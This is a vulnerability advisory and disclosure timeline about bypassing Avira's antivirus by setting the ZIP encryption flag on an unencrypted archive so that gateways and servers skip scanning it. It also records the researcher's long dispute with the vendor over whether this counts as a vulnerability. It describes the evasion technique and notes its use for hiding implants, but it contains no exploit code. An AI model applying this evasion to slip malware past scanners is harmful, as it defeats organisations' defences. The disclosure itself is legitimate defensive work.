________________________________________________________________________
From the low-hanging-fruit-department
AVIRA Generic Malformed Container bypass (ZIP GPFLAG)
________________________________________________________________________
Release mode : No Patch - Coordinated otherwise
Ref : [TZO-13-2020] - AVIRA Generic AV Bypass (ZIP GPFLAG)
Vendor : AVIRA
Status : Not Patched
CVE : none provided,
Blog :
https://blog.zoller.lu/p/tzo-13-2020-avira-generic-av-bypass-zip.html
Vulnerability Dislosure Policy: https://caravelahq.com/b/policy/20949
Affected Products
=================
AV Engine below 8.3.54.138
All Avira products :
- Avira Antivirus Server
- Avira Antivirus for Endpoint
- Avira Antivirus for Small Business
- Avira Exchange Security (Gateway)
- Avira Internet Security Suite for Windows
- Avira Prime
- Avira Free Security Suite for Windows
- Cross Platform Anti-malware SDK
Attention:
Avira does not patch or update their very popular command line scanner
that is still available for download on their website. Since Avira does
not release and advisory their customers are none the wiser.
Avira licenses it's engine to many OEM Partners. The OEM Partners that
use the Avira Engine may be vulnerable or not. I would advise that you
reach out to the vendors listed below to know whether you are affected
or not. OEM Partners
can reach out to me to retreive the POC in order to test.
AVIRA OEM Partners:
- F-Secure
- Sophos
- Barracude
- Alibaba Cloud Security
- Check Point
- CUJO AI
- TP-Link
- FujiSoft
- AWS
- Rohde and Schwarz
- Careerbuilder
- Huawei
- Dracoon
- Total Availability
- FixMeStick
- APPVISORY
- Tabidus
- Cyren
Source :
https://oem.avira.com/en/partnership/our-partners
I. Background
----------------------------
Quote: "We protect people—like you—across all devices, both directly and
via our OEM partnerships.We provide a wide variety of best-in-class
solutions to enhance your protection, performance,
and online privacy—ranging from antivirus to VPN and cleanup technologies.
A server security should get special attention, as a single employee
might store a malicious file on the network and instantly cause a
cascading damage across the entire organization.
With Avira's solutions for server security you can prevent such
scenarios by protecting your network, data, and web traffic. "
Avira has the Trust Seal or the
http://www.teletrust.de/itsmig/
II. Description
----------------------------
The parsing engine supports the ZIP container format. The parsing engine
can be bypassed by specifically manipulating the ZIP Archive (GPFLag)
the Avira parser believes the file to be encrypted although it isn't.
This leads to the Endpoint ignoring the archive and the Avira Gateway
Solutions
to follow the "File is encrypted" logic. By default this blocks the
attachement.
According to my experience most companies are asking employees to
encrypt archives when sending them via email. It is hence very likely
that passworded ZIP files would be allowed through the Gateway.
For these customers, this exploit will bypass the Gateway by leading it
into the wrong logic path believing the file is encrypted. 7ZIP
extracts the file without prompt.
Avira argues that "In this case our product reacts as planned and
defined in our product, we only support standard conform file types in
this case, if the file header shows an encrypted file, we will not try
unpack it. Using a gateway protection without using an endpoint
protection cannot be taken into consideration as it violates common
known standards like the defense in depth strategy."
In my experience companies are mixing AV vendors to increase the
Detection rate. It should be quite common to not have Avira on the
Endpoint if it
is used in the Gateway, there is no guarantee that this Endpoint would
detect the sample that bypassed Avira on the Gateway.
However Avira doesn't believe so assuming all customers also have their
Endpoint solution installed.
I tried to explain the threat model by refering to their own Website
which claims that detection on servers is indeed very important
""Daher sollte auf Server-Sicherheit ein besonderes Augenmerk gerichtet
werden – wenn nur ein einziger Mitarbeiter eine schädliche Datei im
Netzwerk speichert, kann dadurch im gesamten Unternehmen eine fatale
Kettenreaktion ausgelöst werden. Mit Aviras Lösung für Server-Sicherheit
können Sie solche Szenarien verhindern und Ihr Netzwerk, Ihre Daten und
Ihren Datenverkehr im Internet schützen.""
Weird discussions took place after that with Avira arguing that "Defence
in Depth" is a default security strategy that customers should have, I
am going to spare you that discussion.
In Summary: Avira has not patched this flaw (contrary to other Vendors).
All CLient-side products (incldugin servers) will ignore the archive
and not scan it's contents. In case you believe you want AVIRA to focus
on providing most coverage possible feel free to reach out to them. If
you are an OEM partner I suggest you do the same.
III. Impact
----------------------------
Impacts depends on the contextual use of the product and engine within
the organisation
of a customer. Gateway Products (Email, HTTP Proxy etc) may allow the
file through unscanned
and give it a clean bill of health. Server side AV software will not be
able to discover
any code or sample contained within this ISO file and it will not raise
suspicion even
if you know exactly what you are looking for (Which is for example great
to hide your implants
or Exfiltration/Pivot Server).
There is a lot more to be said about this bug class, so rather than bore
you with it in
this advisory I provide a link to my 2009 blog post
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html
IV. Patch / Advisory
----------------------------
I advise customers on scancl.exe (or Unix Variant) to change to another
vendor as Avira
is apparently no longer maintaining it, and apparently also not warning
customers about
vulnerabilities
Furthermore should be be an enterprise customer of the OEM Partners
above I suggest to
reach out to the vendor in order to understand whether this flaw was
patched downstream
in their respective products.
I recommend to the amavisd project to warn users of this facts
https://gitlab.com/amavis/amavis/blob/master/amavisd.conf
In case you have any further questions please direct them to Avira, the
above is based on
the best of my knowledge and since AVIRA does not release Advisories we
are left in the dark
as to what they officially recommend.
V. Disclosure timeline
----------------------------
How Avira handled these reports in 2009 :
https://blog.zoller.lu/2009/04/avira-antivir-generic-cab-bypass.html
The below is a summary of 2-3 evasion reports that I have submitted.
See [TZO-001-2020] Avira for the overall coordination timeline, here is
the specific.
04-12-2019
"For our point of view this is an attack with a very low probability.
Gateway does not check encrypted files
In this case our product reacts as planned and defined in our product,
we only support standard conform file types in this case, if the file
header shows an encrypted file, we will not try unpack it.
In the further process the above mentioned conditions must be taken into
consideration, which lowers the attack vector further.
Using a gateway protection without using an endpoint protection cannot
be taken into consideration as it violates common known standards like
the defense in depth strategy.
All in all I am sorry, but we will stay with our decision, which means,
that we will not handle this as a vulnerability."
Editors note: AVIRA is arguing on "probability" which is risk
management, that's fine for customers, but as Avira does not know the
context
in which the customer is using the product it cannot rate the risk for
thousands of enterprise customers. That's why generally, vulnerability
coordination focuses on the technical aspects and does not go into
"probability" factors.
04-12-2019
- Avira closes the reports
05-12-2019
I reply with
"First you assume it is only 7zip it isn't. I only use 7zip because it
is the most used in my experience within enterprises.
"if the file header shows an encrypted file" -> the archive is not encrypted
You have not taken into account at all that your customers will need to
set the rule set to PASS on encrypted files leaving this UNENCRYPTED
file unscanned. You could scan it but you choose not to, so this is
bypassing your GW protection logic - which you seem not take into account.
You assume your customers have your endpoint solution installed, that is
not necessarely the case, actually I would argue the opposite, more
often than not. Regardless of the rationale above you already set it to
not applicable. As discussed and agreed beforehand I will hence proceed
to publish an advisory on the matter."
Quick Addendum : To talk to my "risk management point". You are talking
about "probability", probability of occurence is for your customers to
determine based on their use case and policy, during risk management.
The probability that someone will use this method is actually high. Why
? The costs of doing so (swapping a byte) is very low and the gain is high.
You made the wrong call, you should have changed your gateway logic and
patch the vuln.
05-12-2019
Aviras reply "As discussed and agreed you can move on with the
disclosure process.
We would kindly ask you for a quick note in the moment you publish the
article."
05-12-2019 I request a list of affected products " I'd need a list of
affected products from you. Any advice to customers on how to configure
the product or any other mitigations?"
05-12-2019
Avira: "can you please clarify the usage of both?
Would these answers be publicly disclosed"
Editors Note: Didn't we just agree that I publish an advisory a few
hours before ?
09-12-2019:
Avira replys, but does not provide a list of affected products.
The reply :
"Which software products are affected?
The feature of unpacking this highly manipulated und corrupted Zip file is
missing in all our consumer products, as our customers are protected by
the real
time protection.
The Avira Exchange Security product will handle a mail with such a file
attached
automatically in the "bad mail process", which is default assigned to
send all
tagged mails to an administrator, but can be configured by the owner.
Mitigations/ Configuration advices:
For customers using our endpoint protection we recommend to not switch off
the real time protection, which is enabled by default."
09-12-2019
I wanted to make sure there is no misunderstanding, as a lot of
components have effectively no "on access" scanner capability (Gateway,
Cloud, Server)
"Thanks a lot, after reading throught this I have 2 Comments :
Can you double check for Avira Exchange? That is not the case, it will
go into the "Encrypted file" liogic and follow the rule set for
passworded files.
Have you consiedered your SMB range of products ? Especially Server, any
further recommendations there? https://www.avira.com/de/server-security
- Quote "Schutz für Datei-Server. Schützt alle auf Ihren Servern
gespeicherten Daten vor Malware.""
09-12-2019
I follow up:
"The problem is that it won't have the same workflow in 95% of the cases
as passworded files are mostly whitelisted. Which was my point in the
report.
Files on servers are often stored and not executed, real time protection
doesn't help alot in this particular case."
09-12-2019
Avira replies:
to comment 1:
In this case it would mean, that an owner decided to differ from the
default and recommended configuration, which moves the layer of
protection from the gateway to the endpoint protection. Which leads us
to the point of "real time protection".
to comment 2:
So to be 100% accurate about that, we are talking about a manipulated
zip file, which is stored on a share drive in the local area network,
which I as a user can access and copy the file from to my local device?
OR We are talking about a manipulated zip file, which is stored in a
share drive in the local area network, which I can access and unzip my
file to? (So the share is not ready only?)
09-12-2019
My reply:s
"I have given presentations about this around 2011 - Rarely the same AV
solution is used on the endpoint than on the Gateway (reasons are
obvious you are most likely to detect more). In a scenario where avira
would have detected the sample but symantec (endpoint) not you have
failed to protect the customer. In addition we are usually talking about
security goals of a product that fails or doesn't. Justifying that one
product fails but another one would catch it is mudding the water and
simply inconsistent. The security promises and goals are not true any
longer. You cannot rely on your customer having other mitigations,
that's also not what you promise customers of your GW product.
You use one example when there are hundreds. If I would be an APT i
would store my stash isnide such a zip file since it can't be parser it
won't be detected and stay dormant, EVEN if detection routines exist in
DLP/AV product.
Whatever the protocol is, SMB, FTP, HTTP, CFIS. File is stored on server
and processed remotely automatically or by a user. That is the reason we
invest in server side AV. Which seems also to be the promise made to
customers.
"Daher sollte auf Server-Sicherheit ein besonderes Augenmerk gerichtet
werden – wenn nur ein einziger Mitarbeiter eine schädliche Datei im
Netzwerk speichert, kann dadurch im gesamten Unternehmen eine fatale
Kettenreaktion ausgelöst werden. Mit Aviras Lösung für Server-Sicherheit
können Sie solche Szenarien verhindern und Ihr Netzwerk, Ihre Daten und
Ihren Datenverkehr im Internet schützen."
10-12-2019
taking all your arguments in consideration we decided, that we will not
investigate any further on this special case, as we do not accept your
argumentation regarding an increased attack vector or an increased risk.
The risk of this file is the same risk as of files being encrypted by
a password and storing the password in a text file next to the zipped file.
Regarding your comments we will stay with our argumentation, that a
security approach and the mitigation of risk should not be based on one
single layer of protection (Defense in Depth).
The following definition of these approach shows our argumentation in
more details,
which we would highly recommend to take into consideration, especially
if APT
attacks are part of your personal threat landscape.
Defense-in-Depth
"Information security strategy integrating people, technology, and
operations capabilities to establish variable barriers across multiple
layers and missions of the organization."
[Bill Bonney, Gary Hayslip, Matt Stamper: CISO Desk Reference Guide
Volume 2, 2018]
Quoting the a white-paper published by the Department of Homeland
Security in September 2016:
"An organization's cybersecurity strategy should protect the assets that it
deems critical to successful operation. Unfortunately, there are no
shortcuts,
simple solutions, or "silver bullet" implementations to solve cybersecurity
vulnerabilities within critical infrastructure [...]. It requires a layered
approach known as Defense in Depth."
Department of Homeland Security, September 2016
We will close this ticket for now.
Thank you for contacting us and feel free to reach us with in case of
any further findings or reports.
10-12-2019
My reply:
With all due respect, I am not discussing security strategies I am
reporting vulnerabilities. I also don't think I need to be lectured on
these. You are running a product vulnerability coordination program not
an incident response program or risk management program in a company.
Per definition this is a vulnerability.
You have not understood the threat model and keep talking about "risks".
When I argue about Enterprise usage of your software you start to argue
that APT is not part of my "personal" threat landscape.
I am giving up on this one and will let your customers decide. I
understand you have no further recommendation for your enterprise
customers using your server side protection."
21-12-2019
I realise that I have still not receive the list of affected products
"You have no answered my request for the list of affected products, I
need a list of products that are affected if you want to respect our
previous agreement and continue collaboration."
21-12-2019
"I provided an answer to that in my post from the 09 Dec 2019 15:20:42 UTC."
Note: They didn't (see above)
22-12-2019
"You have not provided an answer - I need a list of products (Server,
Gateway, Client-side) that are unable to parse the archive.
You are talking about a gateway only."
No reply
13.02.2020
Release of this advisory.